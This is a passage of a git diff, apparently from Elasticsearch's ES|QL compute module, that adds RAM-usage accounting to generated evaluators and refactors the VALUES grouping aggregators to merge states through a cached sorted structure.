org.elasticsearch.compute.gen.Methods.getMethod; import static org.elasticsearch.compute.gen.Types.ABSTRACT_CONVERT_FUNCTION_EVALUATOR; @@ -98,6 +99,7 @@ private TypeSpec type() { builder.addJavadoc("This class is generated. Edit {@code " + getClass().getSimpleName() + "} instead."); builder.addModifiers(Modifier.PUBLIC, Modifier.FINAL); builder.superclass(ABSTRACT_CONVERT_FUNCTION_EVALUATOR); + builder.addField(baseRamBytesUsed(implementation)); for (EvaluatorImplementer.ProcessFunctionArg a : processFunction.args) { a.declareField(builder); @@ -113,6 +115,7 @@ private TypeSpec type() { } builder.addMethod(processFunction.toStringMethod(implementation)); builder.addMethod(processFunction.close()); + builder.addMethod(processFunction.baseRamBytesUsed()); builder.addType(factory()); return builder.build(); } diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java index 018eadd42b44b..e5b6e4992f1a2 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java @@ -9,6 +9,7 @@ import com.squareup.javapoet.ArrayTypeName; import com.squareup.javapoet.ClassName; +import com.squareup.javapoet.FieldSpec; import com.squareup.javapoet.JavaFile; import com.squareup.javapoet.MethodSpec; import com.squareup.javapoet.ParameterizedTypeName; @@ -47,6 +48,7 @@ import static org.elasticsearch.compute.gen.Types.INT_BLOCK; import static org.elasticsearch.compute.gen.Types.LONG_BLOCK; import static org.elasticsearch.compute.gen.Types.PAGE; +import static org.elasticsearch.compute.gen.Types.RAM_USAGE_ESIMATOR; import static org.elasticsearch.compute.gen.Types.RELEASABLE; import static org.elasticsearch.compute.gen.Types.RELEASABLES; import static org.elasticsearch.compute.gen.Types.SOURCE; @@ -96,6 +98,7 @@ private TypeSpec type() { builder.addJavadoc("This class is generated. Edit {@code " + getClass().getSimpleName() + "} instead."); builder.addModifiers(Modifier.PUBLIC, Modifier.FINAL); builder.addSuperinterface(EXPRESSION_EVALUATOR); + builder.addField(baseRamBytesUsed(implementation)); builder.addType(factory()); builder.addField(SOURCE, "source", Modifier.PRIVATE, Modifier.FINAL); @@ -106,6 +109,7 @@ private TypeSpec type() { builder.addMethod(ctor()); builder.addMethod(eval()); + builder.addMethod(processFunction.baseRamBytesUsed()); if (processOutputsMultivalued) { if (processFunction.args.stream().anyMatch(x -> x instanceof FixedProcessFunctionArg == false)) { @@ -123,6 +127,19 @@ private TypeSpec type() { return builder.build(); } + static FieldSpec baseRamBytesUsed(ClassName implementation) { + FieldSpec.Builder builder = FieldSpec.builder( + TypeName.LONG, + "BASE_RAM_BYTES_USED", + Modifier.PRIVATE, + Modifier.STATIC, + Modifier.FINAL + ); + builder.initializer("$T.shallowSizeOfInstance($T.class)", RAM_USAGE_ESIMATOR, implementation); + + return builder.build(); + } + private MethodSpec ctor() { MethodSpec.Builder builder = MethodSpec.constructorBuilder().addModifiers(Modifier.PUBLIC); builder.addParameter(SOURCE, "source"); @@ -411,6 +428,11 @@ interface ProcessFunctionArg { * The string to close this argument or {@code null}. */ String closeInvocation(); + + /** + * Invokes {@code baseRamBytesUsed} on sub-expressions an + */ + void sumBaseRamBytesUsed(MethodSpec.Builder builder); } record StandardProcessFunctionArg(TypeName type, String name) implements ProcessFunctionArg { @@ -535,6 +557,11 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return name; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) { + builder.addStatement("baseRamBytesUsed += $L.baseRamBytesUsed()", name); + } } private record ArrayProcessFunctionArg(TypeName componentType, String name) implements ProcessFunctionArg { @@ -667,6 +694,13 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return "() -> Releasables.close(" + name + ")"; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) { + builder.beginControlFlow("for ($T e : $L)", EXPRESSION_EVALUATOR, name); + builder.addStatement("baseRamBytesUsed += e.baseRamBytesUsed()"); + builder.endControlFlow(); + } } record FixedProcessFunctionArg(TypeName type, String name, boolean includeInToString, Scope scope, boolean releasable) @@ -769,6 +803,9 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return releasable ? name : null; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) {} } private record BuilderProcessFunctionArg(ClassName type, String name) implements ProcessFunctionArg { @@ -853,6 +890,9 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return null; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) {} } private record BlockProcessFunctionArg(TypeName type, String name) implements ProcessFunctionArg { @@ -940,6 +980,11 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return name; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) { + builder.addStatement("baseRamBytesUsed += $L.baseRamBytesUsed()", name); + } } static class ProcessFunction { @@ -1085,6 +1130,18 @@ MethodSpec close() { } return builder.build(); } + + MethodSpec baseRamBytesUsed() { + MethodSpec.Builder builder = MethodSpec.methodBuilder("baseRamBytesUsed").addAnnotation(Override.class); + builder.addModifiers(Modifier.PUBLIC).returns(TypeName.LONG); + + builder.addStatement("long baseRamBytesUsed = BASE_RAM_BYTES_USED"); + for (ProcessFunctionArg arg : args) { + arg.sumBaseRamBytesUsed(builder); + } + builder.addStatement("return baseRamBytesUsed"); + return builder.build(); + } } static boolean isBlockType(TypeName type) { diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java index 1704f4cbeb1fe..e827edd8e996d 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java @@ -199,7 +199,7 @@ private TypeSpec type() { builder.addMethod(ctor()); builder.addMethod(intermediateStateDesc()); builder.addMethod(intermediateBlockCount()); - builder.addMethod(prepareProcessPage()); + builder.addMethod(prepareProcessRawInputPage()); for (ClassName groupIdClass : GROUP_IDS_CLASSES) { builder.addMethod(addRawInputLoop(groupIdClass, blockType(aggParam.type()))); builder.addMethod(addRawInputLoop(groupIdClass, vectorType(aggParam.type()))); @@ -314,10 +314,10 @@ private MethodSpec intermediateBlockCount() { } /** - * Prepare to process a single page of results. + * Prepare to process a single raw input page. */ - private MethodSpec prepareProcessPage() { - MethodSpec.Builder builder = MethodSpec.methodBuilder("prepareProcessPage"); + private MethodSpec prepareProcessRawInputPage() { + MethodSpec.Builder builder = MethodSpec.methodBuilder("prepareProcessRawInputPage"); builder.addAnnotation(Override.class).addModifiers(Modifier.PUBLIC).returns(GROUPING_AGGREGATOR_FUNCTION_ADD_INPUT); builder.addParameter(SEEN_GROUP_IDS, "seenGroupIds").addParameter(PAGE, "page"); diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java index 1872012500ea7..a3a3cbf7e7123 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java @@ -137,6 +137,7 @@ private TypeSpec type() { builder.addField(SOURCE, "source", Modifier.PRIVATE, Modifier.FINAL); builder.addField(WARNINGS, "warnings", Modifier.PRIVATE); } + builder.addField(EvaluatorImplementer.baseRamBytesUsed(implementation)); builder.addMethod(ctor()); builder.addMethod(name()); @@ -159,6 +160,7 @@ private TypeSpec type() { if (warnExceptions.isEmpty() == false) { builder.addMethod(EvaluatorImplementer.warnings()); } + builder.addMethod(baseRamBytesUsed()); return builder.build(); } @@ -581,4 +583,12 @@ private void call(MethodSpec.Builder builder) { } } } + + MethodSpec baseRamBytesUsed() { + MethodSpec.Builder builder = MethodSpec.methodBuilder("baseRamBytesUsed").addAnnotation(Override.class); + builder.addModifiers(Modifier.PUBLIC).returns(TypeName.LONG); + + builder.addStatement("return BASE_RAM_BYTES_USED + field.baseRamBytesUsed()"); + return builder.build(); + } } diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java index 729e435934b89..c68e172ecde69 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java @@ -42,6 +42,7 @@ public class Types { static final ClassName CIRCUIT_BREAKER = ClassName.get("org.elasticsearch.common.breaker", "CircuitBreaker"); static final ClassName BIG_ARRAYS = ClassName.get("org.elasticsearch.common.util", "BigArrays"); + static final ClassName RAM_USAGE_ESIMATOR = ClassName.get("org.apache.lucene.util", "RamUsageEstimator"); static final ClassName BOOLEAN_BLOCK = ClassName.get(DATA_PACKAGE, "BooleanBlock"); static final ClassName BYTES_REF_BLOCK = ClassName.get(DATA_PACKAGE, "BytesRefBlock"); diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java index 51195578ac363..cb0dff8a86dc5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java @@ -24,6 +24,7 @@ import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.data.OrdinalBytesRefBlock; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; /** @@ -55,8 +56,8 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static GroupingAggregatorFunction.AddInput wrapAddInput( @@ -76,7 +77,7 @@ public static GroupingAggregatorFunction.AddInput wrapAddInput( } public static void combine(GroupingState state, int groupId, BytesRef v) { - state.values.add(groupId, BlockHash.hashOrdToGroup(state.bytes.add(v))); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, BytesRefBlock values, int valuesPosition) { @@ -84,17 +85,20 @@ public static void combineIntermediate(GroupingState state, int groupId, BytesRe int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getBytesRef(i, scratch)); + state.addValue(groupId, values.getBytesRef(i, scratch)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - BytesRef scratch = new BytesRef(); - for (int id = 0; id < state.values.size(); id++) { - if (state.values.getKey1(id) == statePosition) { - long value = state.values.getKey2(id); - combine(current, currentGroupId, state.bytes.get(value, scratch)); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValueOrdinal(currentGroupId, id); } } @@ -138,6 +142,22 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + * If built from {@link GroupingState#sortedForOrdinalMerging(GroupingState)}, + * these are ordinals referring to the {@link GroupingState#bytes} in the target state. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -146,15 +166,20 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { - final LongLongHash values; + private int maxGroupId = -1; + private final BlockFactory blockFactory; + private final LongLongHash values; BytesRefHash bytes; - private GroupingState(BigArrays bigArrays) { + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); LongLongHash _values = null; BytesRefHash _bytes = null; try { - _values = new LongLongHash(1, bigArrays); - _bytes = new BytesRefHash(1, bigArrays); + _values = new LongLongHash(1, driverContext.bigArrays()); + _bytes = new BytesRefHash(1, driverContext.bigArrays()); values = _values; bytes = _bytes; @@ -171,6 +196,16 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValueOrdinal(int groupId, long valueOrdinal) { + values.add(groupId, valueOrdinal); + maxGroupId = Math.max(maxGroupId, groupId); + } + + void addValue(int groupId, BytesRef v) { + values.add(groupId, BlockHash.hashOrdToGroup(bytes.add(v))); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -180,8 +215,19 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { + return buildOrdinalOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } else { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -256,14 +302,42 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { - return buildOrdinalOutputBlock(blockFactory, selected, selectedCounts, ids); - } else { - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); - } + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + // hash all the bytes to the destination to avoid hashing them multiple times + BytesRef scratch = new BytesRef(); + final int totalValue = Math.toIntExact(bytes.size()); + blockFactory.adjustBreaker((long) totalValue * Integer.BYTES); + try { + final int[] mappedIds = new int[totalValue]; + for (int i = 0; i < totalValue; i++) { + var v = bytes.get(i, scratch); + mappedIds[i] = Math.toIntExact(BlockHash.hashOrdToGroup(other.bytes.add(v))); + } + // no longer need the bytes + bytes.close(); + bytes = null; + for (int i = 0; i < sortedForOrdinalMerging.ids.length; i++) { + sortedForOrdinalMerging.ids[i] = mappedIds[Math.toIntExact(values.getKey2(sortedForOrdinalMerging.ids[i]))]; + } + } finally { + blockFactory.adjustBreaker(-(long) totalValue * Integer.BYTES); + } + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -279,11 +353,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start], scratch); + case 1 -> builder.appendBytesRef(getValue(ids[start], scratch)); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i], scratch); + builder.appendBytesRef(getValue(ids[i], scratch)); } builder.endPositionEntry(); } @@ -331,9 +405,8 @@ Block buildOrdinalOutputBlock(BlockFactory blockFactory, IntVector selected, int } } - private void append(BytesRefBlock.Builder builder, int id, BytesRef scratch) { - BytesRef value = bytes.get(values.getKey2(id), scratch); - builder.appendBytesRef(value); + BytesRef getValue(int valueId, BytesRef scratch) { + return bytes.get(values.getKey2(valueId), scratch); } @Override @@ -343,7 +416,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - Releasables.closeExpectNoException(values, bytes); + Releasables.closeExpectNoException(values, bytes, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java index f5b0d519dd890..3c0dcd58c29ee 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesDoubleAggregator.java @@ -19,6 +19,8 @@ import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for double. @@ -48,28 +50,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, double v) { - state.values.add(groupId, Double.doubleToLongBits(v)); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, DoubleBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getDouble(i)); + state.addValue(groupId, values.getDouble(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - if (state.values.getKey1(id) == statePosition) { - double value = Double.longBitsToDouble(state.values.getKey2(id)); - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -112,6 +118,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -120,10 +140,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongLongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongLongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongLongHash(1, driverContext.bigArrays()); } @Override @@ -131,6 +156,11 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, double v) { + values.add(groupId, Double.doubleToLongBits(v)); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -140,8 +170,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -216,12 +253,25 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } } } + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } + } + return sortedForOrdinalMerging; + } + Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { /* * Insert the ids in order. @@ -234,11 +284,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendDouble(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendDouble(getValue(ids[i])); } builder.endPositionEntry(); } @@ -249,9 +299,8 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(DoubleBlock.Builder builder, int id) { - double value = Double.longBitsToDouble(values.getKey2(id)); - builder.appendDouble(value); + double getValue(int valueId) { + return Double.longBitsToDouble(values.getKey2(valueId)); } @Override @@ -261,7 +310,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java index 4cfbf329a895d..a25d69b712538 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesFloatAggregator.java @@ -18,6 +18,8 @@ import org.elasticsearch.compute.data.FloatBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for float. @@ -47,34 +49,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, float v) { - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. - */ - state.values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, FloatBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getFloat(i)); + state.addValue(groupId, values.getFloat(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - long both = state.values.get(id); - int group = (int) (both >>> Float.SIZE); - if (group == statePosition) { - float value = Float.intBitsToFloat((int) both); - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -117,6 +117,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -125,10 +139,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongHash(1, driverContext.bigArrays()); } @Override @@ -136,6 +155,15 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, float v) { + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -145,8 +173,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -223,10 +258,23 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -241,11 +289,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendFloat(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendFloat(getValue(ids[i])); } builder.endPositionEntry(); } @@ -256,10 +304,9 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(FloatBlock.Builder builder, int id) { - long both = values.get(id); - float value = Float.intBitsToFloat((int) both); - builder.appendFloat(value); + float getValue(int valueId) { + long both = values.get(valueId); + return Float.intBitsToFloat((int) both); } @Override @@ -269,7 +316,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java index 38e5ad99cf581..2c8c0f409dd5b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesIntAggregator.java @@ -18,6 +18,8 @@ import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for int. @@ -47,34 +49,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, int v) { - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. - */ - state.values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, IntBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + 